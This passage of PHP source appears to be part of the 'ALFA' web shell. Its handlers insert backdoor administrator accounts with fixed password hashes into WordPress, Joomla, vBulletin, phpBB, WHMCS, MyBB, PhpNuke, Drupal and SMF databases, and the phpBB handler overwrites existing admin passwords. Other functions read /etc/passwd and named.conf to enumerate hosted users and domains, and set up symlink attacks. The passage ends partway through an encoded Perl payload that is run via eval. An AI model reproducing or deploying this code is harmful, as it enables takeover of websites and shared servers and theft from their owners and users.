            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50'));
            create_table($table);
            echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form>";
            if ($_POST['alfa2'] && $_POST['alfa2'] == '>>') {
                $localhost = $_POST['alfa3'];
                $database = $_POST['alfa4'];
                $username = $_POST['alfa5'];
                $password = $_POST['alfa6'];
                $admin = $_POST['alfa8'];
                $SQL = $_POST['alfa9'];
                $prefix = $_POST['alfa10'];
                $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
                $solevisible = @mysqli_query($conn, "insert into " . $prefix . "users (ID,user_login,user_pass,user_email) values(null,'{$admin}','d4a590caacc0be55ef286e40a945ea45','{$SQL}')") or die(mysqli_error($conn));
                $solevisible = @mysqli_query($conn, "select ID from " . $prefix . "users where user_login='" . $admin . "'") or die(mysqli_error($conn));
                $sole = @mysqli_num_rows($solevisible);
                if ($sole == 1) {
                    $solevis = @mysqli_fetch_assoc($solevisible);
                    $res = $solevis['ID'];
                }
                $solevisible = @mysqli_query($conn, "insert into " . $prefix . "usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'" . $res . "','first_name','solevisible'),(null,'" . $res . "','last_name','solevisible'),(null,'" . $res . "','nickname','solevisible'),(null,'" . $res . "','description','solevisible'),(null,'" . $res . "','rich_editing','true'),(null,'" . $res . "','comment_shortcuts','false'),(null,'" . $res . "','admin_color','fresh'),(null,'" . $res . "','use_ssl','0'),(null,'" . $res . "','show_admin_bar_front','true'),(null,'" . $res . "','" . $prefix . "capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'" . $res . "','" . $prefix . "user_level','10'),(null,'" . $res . "','show_welcome_panel','1'),(null,'" . $res . "','" . $prefix . "dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
                if ($solevisible) {
                    __alert('Success... ' . $admin . ' is created...');
                }
            }
        }
        if ($_POST['alfa2'] && $_POST['alfa2'] == 'joomla') {
            echo __pre() . '<center><center><div class="txtfont_header">| Joomla |</div><p><p>' . getConfigHtml('joomla') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50'));
            create_table($table);
            echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
            if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
                $localhost = $_POST['alfa3'];
                $database = $_POST['alfa4'];
                $username = $_POST['alfa5'];
                $password = $_POST['alfa6'];
                $admin = $_POST['alfa8'];
                $SQL = $_POST['alfa9'];
                $prefix = $_POST['alfa10'];
                $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
                $solevisible = @mysqli_query($conn, "insert into " . $prefix . "users (id,name,username,email,password) values(null,'Super User','" . $admin . "','" . $SQL . "','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
                $solevisible = @mysqli_query($conn, "select id from " . $prefix . "users where username='" . $admin . "'") or die(mysqli_error($conn));
                $sole = @mysqli_num_rows($solevisible);
                if ($sole == 1) {
                    $solevis = @mysqli_fetch_assoc($solevisible);
                    $res = $solevis['id'];
                }
                $solevisible = @mysqli_query($conn, "INSERT INTO " . $prefix . "user_usergroup_map (user_id,group_id) VALUES ('" . $res . "', '8')") or die(mysqli_error($conn));
                if ($solevisible) {
                    __alert('Success... ' . $admin . ' is created...');
                }
            }
        }
        if ($_POST['alfa4'] && $_POST['alfa4'] == 'vb') {
            echo __pre() . '<center><center><div class="txtfont_header">| vBulletin |<div><p>' . getConfigHtml('vb') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">';
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50'));
            create_table($table);
            echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
            if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
                $localhost = $_POST['alfa2'];
                $database = $_POST['alfa3'];
                $username = $_POST['alfa5'];
                $password = $_POST['alfa6'];
                $prefix = $_POST['alfa7'];
                $admin = $_POST['alfa8'];
                $SQL = $_POST['alfa9'];
                $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_connect_error());
                $pw_col = @mysqli_connect("SELECT column_name FROM information_schema.columns where table_name = '{$prefix}user' and column_name = 'password' and table_schema = '{$database}'");
                $pw_col = @mysqli_num_rows($pw_col);
                $adm_perm = "16744444";
                if ($pw_col > 0) {
                    $solevisible = @mysqli_query($conn, "insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','{$admin}','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','{$SQL}','" . date('Y-m-d') . "','" . time() . "')") or die(mysqli_error($conn));
                } else {
                    $adm_perm = "2143256444";
                    $solevisible = @mysqli_query($conn, "insert into {$prefix}user (userid,usergroupid,username,token,secret,email,passworddate,joindate,scheme,birthday_search) values(null,'6','{$admin}','\$2y\$10\$YsVhV.9tLnzBYxar1BJAGO3vFz68/qDU7Jt62SDdLy6lUT9N5Z/wq','Qf~ADeA}iAey-&#ALQF<}/uBDqSnw>','{$SQL}','" . date('Y-m-d') . "','" . time() . "','blowfish:10','1984-05-20')") or die(mysqli_error($conn));
                }
                $solevisible = @mysqli_query($conn, "select userid from {$prefix}user where username='" . $admin . "'") or die(mysqli_error($conn));
                $sole = mysqli_num_rows($solevisible);
                if ($sole == 1) {
                    $solevis = mysqli_fetch_assoc($solevisible);
                    $res = $solevis['userid'];
                }
                $solevisible = @mysqli_query($conn, "insert into {$prefix}administrator (userid,adminpermissions) values('" . $res . "','" . $adm_perm . "')") or die(mysqli_error($conn));
                if ($solevisible) {
                    __alert('Success... ' . $admin . ' is created...');
                }
            }
        }
        if (isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb') {
            echo __pre() . '<center><div class="txtfont_header">| phpBB |</div><p><p>' . getConfigHtml('phpbb') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50'));
            create_table($table);
            echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
            if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
                $localhost = $_POST['alfa2'];
                $database = $_POST['alfa3'];
                $username = $_POST['alfa4'];
                $password = $_POST['alfa6'];
                $admin = $_POST['alfa8'];
                $SQL = $_POST['alfa9'];
                $prefix = $_POST['alfa10'];
                $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
                $hash = md5('solevisible');
                $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET username_clean ='" . $admin . "' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
                $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET user_password ='" . $hash . "' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
                $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET username_clean ='" . $admin . "' WHERE user_type = 3") or die(mysqli_error($conn));
                $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET user_password ='" . $hash . "' WHERE user_type = 3") or die(mysqli_error($conn));
                $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET user_email ='" . $SQL . "' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
                if ($solevisible) {
                    __alert('Success... ' . $admin . ' is created...');
                }
            }
        }
        if (isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs') {
            echo __pre() . '<center><div class="txtfont_header">| Whmcs |</div><p><p>' . getConfigHtml('whmcs') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value); return false;" method="POST">';
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50'));
            create_table($table);
            echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
            if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
                $localhost = $_POST['alfa2'];
                $database = $_POST['alfa3'];
                $username = $_POST['alfa4'];
                $password = $_POST['alfa5'];
                $admin = $_POST['alfa8'];
                $SQL = $_POST['alfa9'];
                $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
                $solevisible = @mysqli_query($conn, "insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','" . $admin . "','d4a590caacc0be55ef286e40a945ea45','" . $SQL . "','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
                if ($solevisible) {
                    __alert('Success... ' . $admin . ' is created...');
                }
            }
        }
        if (isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb') {
            echo __pre() . '<center><div class="txtfont_header">| Mybb |</div><p><p>' . getConfigHtml('mybb') . '</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50'));
            create_table($table);
            echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
            if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
                $localhost = $_POST['alfa2'];
                $database = $_POST['alfa3'];
                $username = $_POST['alfa4'];
                $password = $_POST['alfa5'];
                $admin = $_POST['alfa8'];
                $SQL = $_POST['alfa9'];
                $prefix = $_POST['alfa10'];
                $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
                $solevisible = @mysqli_query($conn, "insert into " . $prefix . "users (uid,username,password,salt,email,usergroup) values(null,'" . $admin . "','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','" . $SQL . "','4')") or die(mysqli_error($conn));
                if ($solevisible) {
                    __alert('Success... ' . $admin . ' is created...');
                }
            }
        }
        if (isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke') {
            echo __pre() . '<center><div class="txtfont_header">| PhpNuke |</div><p><p>' . getConfigHtml('phpnuke') . '</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value); return false;" method="POST">';
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50'));
            create_table($table);
            echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
            if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
                $localhost = $_POST['alfa2'];
                $database = $_POST['alfa3'];
                $username = $_POST['alfa4'];
                $password = $_POST['alfa5'];
                $admin = $_POST['alfa7'];
                $SQL = $_POST['alfa9'];
                $prefix = $_POST['alfa10'];
                $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
                $hash = md5($pwd);
                $solevisible = @mysqli_query($conn, "insert into " . $prefix . "_authors(aid,name,email,pwd) values('{$admin}','God','{$SQL}','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
                if ($solevisible) {
                    __alert('Success... ' . $admin . ' is created...');
                }
            }
        }
        if (isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal') {
            echo __pre() . '<center><div class="txtfont_header">| Drupal |</div><p><p>' . getConfigHtml('drupal') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'drupal\'); return false;" method="POST">';
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true));
            create_table($table);
            echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
            if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
                $localhost = $_POST['alfa2'];
                $database = $_POST['alfa4'];
                $username = $_POST['alfa5'];
                $password = $_POST['alfa6'];
                $admin = $_POST['alfa8'];
                $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
                $getDescuid = @mysqli_query($conn, "select uid from users order by uid desc limit 0,1");
                $getDescuid = @mysqli_fetch_assoc($getDescuid);
                $getDescuid = $getDescuid['uid'];
                $getdescuid = $getDescuid++;
                $solevisible = @mysqli_query($conn, "insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('{$getDescuid}','{$admin}','\$S\$DP2y9AbolCBOd\\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));
                $solevisible = @mysqli_query($conn, "select uid from users where name='" . $admin . "'") or die(mysqli_error($conn));
                $sole = mysqli_num_rows($solevisible);
                if ($sole == 1) {
                    $solevis = mysqli_fetch_assoc($solevisible);
                    $res = $solevis['uid'];
                }
                $solevisible = @mysqli_query($conn, "INSERT INTO users_roles (uid,rid) VALUES ('" . $res . "', '3')") or die(mysqli_error($conn));
                if ($solevisible) {
                    __alert('Success... ' . $admin . ' is created...');
                }
            }
        }
        if (isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf') {
            echo __pre() . '<center><center><div class="txtfont_header">| SMF |</div><p><p>' . getConfigHtml('smf') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\'smf\'); return false;" method="POST">';
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true));
            create_table($table);
            echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
            if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
                $localhost = $_POST['alfa2'];
                $database = $_POST['alfa3'];
                $username = $_POST['alfa5'];
                $password = $_POST['alfa6'];
                $prefix = $_POST['alfa7'];
                $admin = $_POST['alfa8'];
                $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
                $setpwAlg = sha1(strtolower($admin) . 'solevisible');
                $solevisible = @mysqli_query($conn, "insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'{$admin}','1','{$admin}','{$setpwAlg}','solevisible@fbi.gov')") or die(mysqli_error($conn));
                if ($solevisible) {
                    __alert('Success... ' . $admin . ' is created...');
                }
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfaMakePwd()
    {
        if (_alfa_file_exists("/etc/virtual/domainowners") || _alfa_file_exists("/etc/named.conf") && _alfa_file_exists("/etc/valiases")) {
            return "/home/{user}/public_html/";
        }
        $document = explode("/", $_SERVER["DOCUMENT_ROOT"]);
        $public = end($document);
        array_pop($document);
        array_pop($document);
        $path = implode("/", $document) . "/{user}/" . $public;
        return $path;
    }
    function alfaGetDomains($state = false)
    {
        $state = "named.conf";
        $lines = array();
        $lines = _alfa_file('/etc/named.conf');
        if (!$lines) {
            $lines = @scandir("/etc/valiases/");
            $state = "valiases";
            if (!$lines) {
                $lines = @scandir("/var/named");
                $state = "named";
                if (!$lines && $state) {
                    $lines = _alfa_file('/etc/passwd');
                    $state = "passwd";
                }
            }
        }
        return array("lines" => $lines, "state" => $state);
    }
    function alfaCreateParentFolder()
    {
        $parent = $GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__;
        if (!@is_dir($parent)) {
            @mkdir($parent, 0755, true);
        }
    }
    function alfasymlink()
    {
        alfahead();
        AlfaNum(9, 10);
        alfaCreateParentFolder();
        @chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
        echo "<div class=header><br><center><div class=\"txtfont_header\">| Symlink |</div><center><h3><a href=javascript:void(0) onclick=\"g('symlink',null,null,'symphp')\">| Symlink( php ) | </a><a href=javascript:void(0) onclick=\"g('symlink',null,null,'symperl')\">| Symlink( perl ) | </a><a href=javascript:void(0) onclick=\"g('symlink',null,null,'sympy')\">| Symlink( python ) | </a><a href=javascript:void(0) onclick=\"g('symlink',null,null,null,null,'SymFile')\">| File Symlink | </a></h3></center>";
        if (isset($_POST['alfa2']) && ($_POST['alfa2'] == 'symperl' || $_POST["alfa2"] == "sympy")) {
            $sympath = alfaMakePwd();
            @mkdir('cgialfa', 0755);
            @chdir('cgialfa');
            alfacgihtaccess('cgi');
            $perl = "#!/usr/bin/perl   -I/usr/local/bandmin\nuse MIME::Base64;use Compress::Zlib;my \$alfa_data=\"ALFA_DATA\";eval(Compress::Zlib::memGunzip(decode_base64(\"H4sIAAAAAAAA/50Ye1PTSPyrLLFnEqV5VBBs2gKH4jmjciPoP5TrbLLbNpImuez2Zamf/X77SBqgoHOZId3N/t7vZcooirKUcZxy9OFicPr+A+r20A5dxIwz1Dj58v7blXcdTJaoMWv5qIsMQ21CtY6HyFJ4NlrlRQxkjNMs5TTlTb7MaRtxuuDumE+SftpPO2LR64wpJr0Oj3lCe6cZoQSFS3Ty8ewEXdKTTx1XnXQYX8IPXgkSTUKjrMA8ztJ2mqU0WHdcdd5xFbkwI0sUjqIsyYqu+cyTj9kzAiWW2SHxDEmUrpFjQuJ01Pa9fBEEE1yM4rQZZpxnE/UtzApCi7afLxDBbAwSPhvKJ5D027AT5AMpGk7iUdqOQGdaBEPQvjmn8WjM22GWEPWBxT9ou/UaKBsbjVmWUMQwQc9RnM5iFoew/4kulpMkTm/Qn0v0Ny2SjguC98xgTRNGV9oNlWeUJxo4GeIBwRw7hhuNYrF1jWDNpiGQHuCiwEu0AsdZgO/tNma+ZwPa8UA484+ZP4TNBOdo1RgI//trdCwAg4LyaZEiS8UDIPvDlUBe2/aR3/YUg3xOStqvNdV4aO3osFhpGkLwYA0HAIXov8ggcUEjblQAhjvOJtRdTRkt1m4+DZM4Goh4EYoAXpMCCOWRm+IJJQ6E7dBAz5+jJtHfZ+AHzChzf5PmMcuTmIPA8tdy+667ixrvPn9bGW/PT79+evf5cvDl/PzSWNsq5g8ANs9ypBCD2lKz+57FqWW4xq7+bjsggWZuIAcoKItN8A3lRWm0PeA6o+LlH4r3vjaiTqcOQKqwNR9GmwlpBLEvYgyVkX8Gj+dD5APDPcfouOIU0kQAcrKFVkKHXFDCaFzQYdc0HJCKSiddHYnn2kBHyPyOZ5hFRZzzNk5owS1jDtVDVI5hnBJEsgmOU8dxDNtsI3PMed52XROEoLZjmIhDllHeNQdhgtMb857QnnfSanlKaFoTGleCb9Hy7Ewh+IcP1KxrAzniGCIlmMosV6xzSC2HL7g43oes+ZWAYFNZT3R2PhDQ5UVPZxzJBsDpfk7IEPJfiRiaE/ldfDqe+fvwydKbqLZ+Va0bMwJrX5OApaeWbzZLb7P0FUQt1WTGQFaoY8FDfwqynEJ6E0+4ju0i816CmTbKigqnTDAj0FJ3NGIviJIMWoneKtaAI3hXSCV7IbR5N2FNKQcUBKQaTWtXASreB1J3zbKgonQXEurOueJ5cJfLDBdKm6c5+L/g4JccdsTGXiknQDmDB6rytqK21bCzuOBTnLgqVbJ5SgtWmfiOEE9b1tdaHtacXjOr5vKkzoeaW7RV48ONSQ9LXaQdHw8RImVRBDvyuJRdbqr25WnL6e0bva0Uq+JXcLVyzNi84qp2j1hMHfYC4QoIVrU1gg1lXU91EUDviiIrRLnSolXlFos2rAaArumbZcEMcXQzKrJ